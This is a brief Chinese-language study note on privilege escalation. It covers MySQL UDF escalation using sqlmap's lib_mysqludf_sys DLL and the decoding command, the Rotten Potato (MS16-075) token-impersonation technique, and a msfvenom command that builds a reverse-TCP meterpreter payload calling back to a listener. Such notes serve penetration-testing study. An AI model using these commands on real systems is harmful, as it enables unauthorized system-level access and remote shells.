提权初探

提权初探
xiuMySQL
udf提权
udf = ‘user defined function’,即‘用户自定义函数’。是通过添加新函数,对MYSQL的功能进行扩充
1、 如何获得udf文件
2、 将文件放到哪才能让mysql承认这个函数
3、 函数功能
4、 为什么这东西能提权(自定义函数指令是直接以管理员的权限运行的)
Sqlmap
udf位置
/usr/share/sqlmap/data/udf/mysql/windows/64/lib_mysqludf_sys.dll_
暂时不能用,需要解码
cd /usr/share/sqlmap/extra/cloak
python3 cloak.py -d -i /usr/share/sqlmap/data/udf/mysql/windows/64/lib_mysqludf_sys.dll_
放到哪
1 | MySQL<5.0,导出路径随意; |
select @@basedir; + lib/plugin/
创建函数
create function sys_eval returns string soname ‘udf.dll’;
烂土豆(ms16-075)
原理
1、欺骗“NT AUTHORITY\SYSTEM”账户通过NTLM认证到控制的TCP终端
2、对这个认证过程使用中间人攻击(NTLM重放),为“NT AUTHORITY\SYSTEM”账户本地协商一个安全令牌。这个过程通过一系列的Windows API调用实现的。
3、模仿这个令牌。只有具有“模仿安全令牌权限”的账户才能去模仿别人的令牌。一般大多数服务型账户(IIS、MSSQL等)都有这个权限,用户级账户大多数没有这个权限。
payload:https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-075
msf生成木马
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.113 LPORT=5555 -f exe > shell.exe
use exploit/multi/handler
1 | meterpreter > getuid |